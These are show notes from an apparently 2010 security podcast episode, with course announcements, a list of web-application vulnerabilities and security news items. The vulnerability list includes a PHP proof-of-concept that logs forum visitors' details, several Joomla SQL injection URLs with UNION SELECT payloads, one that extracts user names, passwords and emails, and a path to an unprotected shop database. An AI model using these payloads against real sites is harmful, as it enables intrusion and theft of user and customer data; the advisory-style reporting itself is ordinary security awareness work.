Episode 98 – Closer to a Century

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

• April 15th – 18th, 2010 Cleveland, Ohio
• http://notacon.org/
• Adrian will be there presenting on Anti-Forensics

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. Simple Machines Forum Avatar is subject to a Remote php File vulnerability.  This vulnerability allow execute a php external file in any visitor of the forum. The php file should have the malicious code. The scope of the attack depends on the strength of the php file.  This impacts version 1.1.8, though others may be vulnerable as well.  Proof of concept is available:
      <?php
      $ip = $_SERVER['REMOTE_ADDR'];
      $so= $_SERVER['HTTP_USER_AGENT'];
      $lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
      $url= $_SERVER['PHP_SELF'];
      $path= $_SERVER['DOCUMENT_ROOT'];
      $archivo = ‘hacks.txt’;
      $fp = fopen($archivo, “a”);
      $string = ”
      Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
      by Jose Luis Gongora Fernandez (aka) JosS

      $path$url

      VICTIM: $ip

      info: $so
      language: $lan

      “;
      $write = fputs($fp, $string);
      fclose($fp);
      ?>

   2. Joomla Component dcsFlashGames is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Version 2.0RC1 is impacted. Example URL is available:  http://www.sample.com/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&;catid=[INDONESIANCODER]
   3. Joomla Component com_solution is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_solution&Itemid=5&task=contry&con=-1+UNION+SELECT+1,2,3,4,5,6,7,8–
   4. Joomla Component com_units is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_units&task=unit&id=-1 UNIONSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28–
   5. Joomla Component com_tariff is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_tariff&detail=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11
   6. Joomla Component com_agency is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_agency&task=view&aid=-1 UNIONSELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
   7. Joomla Component com_adds is subject to a Blind SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2–
   8. Joomla Component com_departments is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8–
   9. Joomla Component com_business is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,3–
   10. Joomla Component com_radio is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8–
   11. Asp – comersus7F Shopping Cart Software is subject to a Backup Dump Vulnerability. By default, comersus.mdb isn’t password-protected, and contains the order information (buyer’s address, phone, order status, tracking #, obs, etc), settings (encryption password, admin email, company information, etc) and shipment data.  Exploit URL is available:  http://www.sample.com/Comersus/database/comersus.mdb .
   12. Powie’s PSCRIPT Gästebuch is subject to a SQL Injection Vulnerability. All versions earlier than 2.09 are impacted.  Exploit URL is available: http://www.sample.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2

Stories of Interest:
News item 1: http://www.theregister.co.uk/2010/03/29/ie_emergency_fix/
Microsoft has announced plans to release an out-of-sequence patch, designed to resolve a zero-day vulnerability in Internet Explorer.

A cumulative update to Internet Explorer (MS10-018) plugs a security hole in IE 6 and IE 7 exploit by hackers over recent weeks. The latest version of Microsoft’s browser – IE 8 – is not vulnerable to the flaw, which Microsoft first acknowledged was a problem on 9 March.

The vulnerability involves a flaw in the iepeers.dll library involving the handling of invalid values passed to the “setAttribute()” function. Exploits create a means to drop malware onto the PCs of victims, providing they visit booby-trapped website using vulnerable version of IE.

News item 2: http://www.computerworld.com/s/article/9174337/Apple_delivers_record_monster_security_update?taxonomyId=17
Apple today patched 92 vulnerabilities, a third of them critical, in a record update to its Leopard and Snow Leopard operating systems.

Security Update 2010-002 plugged 92 holes in the client and server editions of Mac OS X 10.5 and Mac OS X 10.6, breaking a record that has stood since March 2008. The update dwarfed any released last year, when Apple’s largest patched 67 vulnerabilities.

Today’s security roll-up fixed flaws in 42 different applications or operating system components in Mac OS X, from AppKit and Application Firewall to unzip and X11, the Mac’s version of the X Window System.

News item 3: http://fcw.com/articles/2010/03/23/web-fose-bratton-lapd-cyber.aspx
Local police departments have the knowledge but lack the resources for cybersecurity-related police efforts, according to former Los Angeles Police Department Chief Bill Bratton.

Speaking as the keynote address at the FOSE 2010 trade show in Washington, Bratton said local police departments have been behind the curve for most of their history in tackling computer-related crime and cybersecurity.

Bratton, who also served as commissioner of the New York City Police Department, also said that computer security is an unmet challenge for police departments that is unlikely to be addressed in significant way because of funding, prioritization, resources and access to systems.

He added that the situation is frustrating for police chiefs. We know how to do it; we know how to coordinate it,” he said. “It.s a resource issue.”  Bratton is now chairman of Altegrity Risk International. He also previously served as chief of the New York City Transit Police and as Boston Police Department commissioner.

News item 4: http://www.ottawacitizen.com/technology/Canada+easy+prey+cyber+attacker+expert/2718450/story.html
Canada is woefully unprepared for a massive cyber-attack that is within the capabilities of any run-of-the-mill hacker, and which could cripple the business of the nation, warns a leading security expert.

Dragos Ruiu, an Edmonton-based computer security consultant, says it’s time for the government to protect complex computer networks that can now be hijacked with the simplest of tools.

“There has got to be a lot more thought and a lot more talk and a lot more brains applied to the situation,” said Ruiu. “The cyber-warfare world is the only place a 17-year-old kid can take on a nation-state and win.”

Ruiu, a key organizer of the CanSecWest Applied Security Conference in Vancouver, said that when it comes to computer security, even the popular pocket-sized smartphones are open to attack. He said this years conference will play host to a hacking contest to see which cellphone is the most secure.

News item 5:  http://news.bbc.co.uk/2/hi/europe/8586269.stm
A Frenchman who police say hacked Twitter accounts belonging to US President Barack Obama and celebrities could face jail. The unemployed 25-year-old was arrested on Tuesday after an operation lasting several months, conducted by French police with agents from the FBI.  The 25-year-old is said to have hacked into the micro-blogging website, by simply guessing users’ passwords.

The suspect reportedly targeted other celebrities, including Britney Spears. After being questioned by police, he was ordered to appear at court in the central French city of Clermont-Ferrand on 24 June.